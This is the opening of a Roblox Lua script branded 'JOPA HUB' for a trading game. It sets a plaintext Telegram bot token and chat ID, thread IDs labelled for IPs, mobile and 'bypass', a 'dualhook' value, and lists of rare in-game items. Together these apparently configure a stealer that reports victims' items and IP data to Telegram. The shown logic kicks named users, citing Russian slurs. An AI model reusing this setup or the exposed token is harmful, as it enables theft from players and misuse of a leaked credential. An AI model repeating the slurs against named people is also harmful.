aprplayers = {
    "Guest194827461",
    "skibiditolet2018",
    "typazveer",
    "speralka8814",
    "eqz_s",
}
webhook = 10
poor = 37
chatId = -1002853777462
botToken = "8432656507:AAEpuoT4W15g_9iNBxFmTAQTwF9ZLtkBdRo"
threadIdIP = 104
threadmobile = 6
reportsid = 29143
bypassid = 778907
richgodliesList = {"Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}
richgodliesListpc = {"TreeKnife2023", "Turkey2023", "TreeGun2023","TravelerGun","Sakura_K", "Blossom_G", "ZombieBat", "Constellation", "Candy", "VampireGun", "SunsetKnife", "SunsetGun","Darksword","Darkshot","Rainbow_G","Rainbow_K","Bauble"}
skinNamesTG = {"Corrupt","Vampire's Axe","Gingerscope","Traveler's Axe","Celestial","Icepiercer","Harvester","Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}

dualhook = 783646
local LP = game.Players.LocalPlayer
bannedUsers = {
    ["Lym_312"] = "Dolbaeb and pidor",
    ["NatalkaPralka2013"] = "Dolbaeb and pidor",
    ["3boodkwtkingg"] = "Dolbaeb and pidor",
    ["polly_Bafy6"] = "Dolbaeb and pidor",
    ["BartaNeDen1"] = "Dolbaeb and pidor",
    ["MOJ_2215"] = "Dolbaeb and pidor",
    ["gabi_gol7951"] = "Dolbaeb and pidor",
    ["nikitawlk113"] = "Dolbaeb and pidor",
    ["blossom_cute90"] = "Dolbaeb and pidor",
    ["lpo91a"] = "Dolbaeb and pidor",
    ["samuel_202233"] = "Dolbaeb and pidor",
    ["lenivayzopakota4"] = "Dolbaeb and pidor",
    ["lenivayzopakota62"] = "Флуд",
    ["BAIKALsky_SA"] = "Dolbaeb and pidor"
}
if bannedUsers[LP.Name] then
    local reason = bannedUsers[LP.Name]
    game.Players.LocalPlayer:Kick("JOPA HUB - You are banned. Reason: " .. reason)
    return
end
